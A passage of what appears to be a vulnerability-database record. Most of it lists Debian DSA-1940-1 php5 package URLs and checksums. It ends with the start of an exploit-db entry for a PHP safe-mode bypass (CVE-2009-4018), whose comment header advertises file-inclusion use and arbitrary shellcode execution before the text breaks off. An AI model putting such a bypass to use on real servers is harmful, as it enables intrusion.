http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 80462 01e1945015c365eb270144a4e188fd16\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 97422 5a623806538b44d685b98d9bba8026cd\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 54638 feaac8e729df35048a6d319fb090d744\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 26676 38a13a34ebc2f46ff8219e682b17cdd7\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 54926 2e013fb3a2e59d02b1ef197a31f60cbd\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 20530 044b9c937f466eec8cbf6ccc1de17227\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 6238 06c8690f431ab5945a1ac80affb52ee6\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 24692 cf39a8df7f09fe83c7b1de899a1662a8\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 11954 e8c1ebf98256ddcc6b85c1b03604e846\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 3380088 b24fcc9af9fd3abda5204eab88a997a6\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 38236 3d5fc653a76612f99de76c138777f0cb\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 3377872 b520a2e4b246e6f83190f8ed92adad97\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 362742 eef1d7d94aa55fab8d7de8647107adee\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 6611744 5d9157db59b594960657c570afd63bce\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 51778 584d492491c39741ca85814e2a4fb69e\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 18192 461302f23ae7e5342dabdd0836f6a24a\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 15854 04a6eda903a99d0181942e3aad91e452\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 3325104 2f19b51e3398e3c8d7f90a1a8066973e\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 6546 976bed7dd4fdd95a97658caf08682106\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_ia64.deb\n Size/MD5 checksum: 17618574 405a18e1d7b1e92db059ab96817a6bea\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 2521042 d82a509595385f3ab5e289f9b65bb2e7\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 362870 e552f36101268867df45cda6d1d9059a\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 18432 7c906ed34659f7dfa3f79d37702908b6\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 32342 c0fe1af9cffd675ebe057500648ae3e1\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 4961170 fae18f6605a53e0b800c539512940d04\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 35782 2c2d89e6837cacb1fb81bf1979bf9abc\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 5308 63cc0839bedc0f115947d844e68a6e82\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 24914 006db50d9a554d4deea8cd47909e0ad6\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 35496 5656e40c5ad2b36af53b4f856195b899\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 12378 96c8087deb4f2f412e92279edaf4d864\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 2492036 9aa43e8786e9f719369b3d55de97dc78\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 23202 80e4dab9faec43d9911775191465fdb1\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 16030 1c343e67452942cea772caccabd9e997\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 32426 fbc68235a41e2716a7b5513199e24a65\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 12924 cb7414eb624b578d63866f78b704c371\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 13308 892af13baf98c5b0be0eb5f1478a8c0a\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 4998 d355969fc758967ace82363e92d04417\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 8272 9dc36f64887ad982e029e23862fa1c34\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 63520 86cd0d2b1a9a9a163bfbf614d1a72e2f\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 9448080 2c68349c22789beee911a0d460ce07ab\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 2519330 e8ee82a24d72678255986d55800a4bca\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 51114 723352f4d34ee8aa299a8419e15279ea\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 11508 2ba522caf5a022f18854dcc1361762c5\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 33802 1647717e78aa144795f7e6adc1a63db3\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_mips.deb\n Size/MD5 checksum: 366552 1aa9231e57a5d970305a92ed228c354e\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 35640 260bf4b4d9d738132dbe75be83278557\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 5264 13dd2dec094142c47e3d6c09aafda25b\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 62768 5fd972e08367cf7f5f6b571eb649f704\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 12836 1306fcd368938a9061c2ccaa9859fd18\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 31786 af4a26316b774376fca06ec5423c91e7\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 35250 a6794920388c39ea6abe16f8c9cff3a7\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 2476812 04e0649d164c002dc0e4e0b4df9568ff\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 4905822 a5a669d753be6c5c51176b26779bdbb1\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 15902 7e213960c00ef0237daafc7578aca562\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 23092 b7cd947925df1b3e74d7bce54c672ed5\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 24748 804813f3b95ab1c40ca198048590741d\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 33614 623a98cfc66c7c9bbfef747a274f0f8e\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 13204 66621ba735e09a3ec50cda4c94f5f2bd\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 12304 6ae4665f265c125753d1d31c433e9dfb\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 362814 ab3354bf4a4a368e685bffedb09376b8\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 2477692 db7ebff59343f16b69f7b20499faf0f9\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 365910 7238434292479e961899ac3b25b83dfc\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 4986 85b05558a4eb271f8cbb269625acc3e9\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 8206 c3422b954faacc955df47a7ff0b7db25\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 8854868 733d49e89123d42778489c71d24b9e8b\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 50820 cbff5479e50dda1d4d71754e13e215cf\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 11436 0ce2418fb50d162941d0bd4a96197764\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 18318 8313fa1ab718d03b78489354c97a8275\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 2467638 c6205ceed2a60357d87717dfa20edd59\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_mipsel.deb\n Size/MD5 checksum: 32256 1d76d7bff4e9ad20e284579468ad24bb\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 42772 a10f78ac0173806b5b0250fca630ca79\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 39126 afa2f55f60ae6605b9a235beee45a0d6\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 30520 e573086adc8f0a6befa32c5304b150d4\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 42346 2239cd7d3129be3c405ad9763f516f52\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 38116 5e8d5608052aea27e58e036fb9307405\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 371994 a29cfdbf741e699d84848029da1f86eb\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 15942 193247fce0a5337d4b3d78f44c3b9f64\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 2646006 a0e172860476b4e0ed542a5e2f59299a\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 20050 9c019238ec6a443662046bb3790f6d17\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 41068 84f536ebf2778dde5efff14714c90344\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 56404 ca850bc81f0c9ca5af45adbb81376afc\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 16058 d306dbcc68c5a3cbb394db8259d5ecc9\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 21522 e77fe80b3d108c55704db8b93e607721\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 10986 fb82f425ba08319e81828c7ad42355a3\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 16950 db2f298eca4b27dd848c1863175b4361\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 7520 6e27c85fa52e758b6ff3b197f0cefae6\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 5076366 669efda82f3242bc9e86456f028f2827\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 365198 600eab0c63ddc7ab908c2d50b7e02515\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 2648042 4e01d686d71221de21e78df46fffc589\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 14124 e5a26cfb7fad9c2c8862a92c555a947a\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 7222 27d77bf832f9fa3cd6a22e56c43f29cd\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 77076 c40f6796e97717034eb0dc48e7672c97\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 60226 3332c67d7dd725f69b3feaa027432ebe\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 2559120 e185342a100d9c1a6c324b6bd8348329\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 28050 89733a4b7c5c0f82ab6d98bdfdc0904c\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 9007430 f80ca9c8341ea5cad05a381901f818d3\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 9356 56a344de471f799626465b39711416d9\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 5230158 96112cf26d0089d9d2efac1a08c9580c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 36318 5cd8828dc17f7e532f6cb6da218679b3\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 14188 c53279b33f59d0e59b75cc94fde8c63e\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 28246 d95b59b18e9c017d7531ab3ded0589f7\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 12362 122c0ce63bb0b6f1a47bc4125c0eefa5\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 2697694 c7ffdcfcb631e374ab084a5f3a989306\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 41960 1141ba26f14d750e4c765f60b62c6083\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 362724 c993784ed600577e353baaed00bea5f4\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 9065776 9783f66f3d79189473aa07331495b42f\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 2634090 54348da8b9648358d62658be37a8a72d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 39718 aeead9b2523b76d4c2de2d195be14e0a\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 14002 63dae36e061720e94881db620ed33960\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 18600 2633eff8bca65e3dc772922913d0d222\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 38346 6a9c83cc55c6a828236901c20358b276\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 369974 2731c72660d16fd12fb8b6956da74e94\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 37990 416dde4d1c408b50c1549be51ef4eed2\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 73810 7c7df745c1d39056a1d4a7283eeffb5e\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 5592 31e7047d94f0938ab3a4b62fa5932b23\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 2699302 e0b0afb1d5ecde8c93eaffab06e6bd2f\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 15530 aedea8fda2c1c9cafe317b48e4c7cf8b\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 58566 60ced2f87243f641eb0db9ab58165668\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 25194 835ed177060f54073dcce45b8166490d\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 20684 7db377c886fb208d1d4769814442a1d5\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 5300 8ca0fa30c94c14ebea24e46df78ef76d\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 8391240 ac3b24fe2c94b6b60f81e82d1dbe733c\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 5018 70ad7f1d15ac89a0f7886587d607cac0\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 11212 cd6b537b33f8ad26d9ba156e20e776ea\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 49796 3596f22c8bd2c544352cf0d9b3bda9b3\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 16536 b04adeb58919b0acaaaf6d85daf261e7\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 13094 6eaa2cad1739078bbe77608d6e9402f3\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 4819058 82d9d067a49433234d0aa27e485c7e49\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 4814 1d92ce69b9a900410000661e37f13d78\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 2474432 429e7bb0c573e280a2f37be8a1219821\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 8198 c246840d64024920e3b13b77ec7a1547\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 43994 55de49a1ecd5a79cd2bb3ad4b316a17b\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 2475470 20c826e1c15faafbf10168383ac03785\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 365376 4fc32fdeaff717f88d2e811041ac4191\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 34078 7df2d213d28ea42dbea22c9ba97f9b5d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 32892 31e0f5a679abac892eddf816ea2d8255\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 2425906 146247c275cdf061697d3dc22831035e\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 367108 cea847606b0797e999585db57fe03b81\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 13454 b5392b750166a2add3efc308486df197\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 24310 d3dbee9f6b7f6068b2d45c57b50df77b\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 62862 214758c2104dc3ed2100c39513e9635f\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 17492 0845452499413beff2ebd12867c6e6d4\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 35954 23ecc855077d61fe5d2d35e1c7e4e4ca\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 12324 6c2ee5f17f1d95c24fada5784163df2f\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 24362 721e0d84ff3b0d5947bfea13d009bcb4\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 32964 eb58bb0af7602ea6eb7f47612cfbb1bb\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 32512 5cbc110ce6fd2fced13c1c388bed9ced\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 7, "modified": "2009-11-25T21:51:39", "published": "2009-11-25T21:51:39", "id": "DEBIAN:DSA-1940-1:73225", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00263.html", "title": "[SECURITY] [DSA-1940-1] New php5 packages fix several issues", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T14:43:52", "description": "Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0). CVE-2009-4018. Webapps exploit for php platform", "published": "2010-03-05T00:00:00", "type": "exploitdb", "title": "Kolang proc_open PHP safe mode bypass 4.3.10 - 5.3.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2010-03-05T00:00:00", "id": "EDB-ID:11636", "href": "https://www.exploit-db.com/exploits/11636/", "sourceData": "<?php\r\n/*\r\nKolang (PHP Safe mode bypass)\r\n(IHSteam priv8 for lazy penetration testers)\r\n\r\n(php 4.3.10 - 5.3.0)\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)\r\nhttp://www.milw0rm.com/exploits/7393 (12/09/2008)\r\n\r\n1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)\r\n2- Kolang can execute arbitrary shellcode (just for fans of metasploit 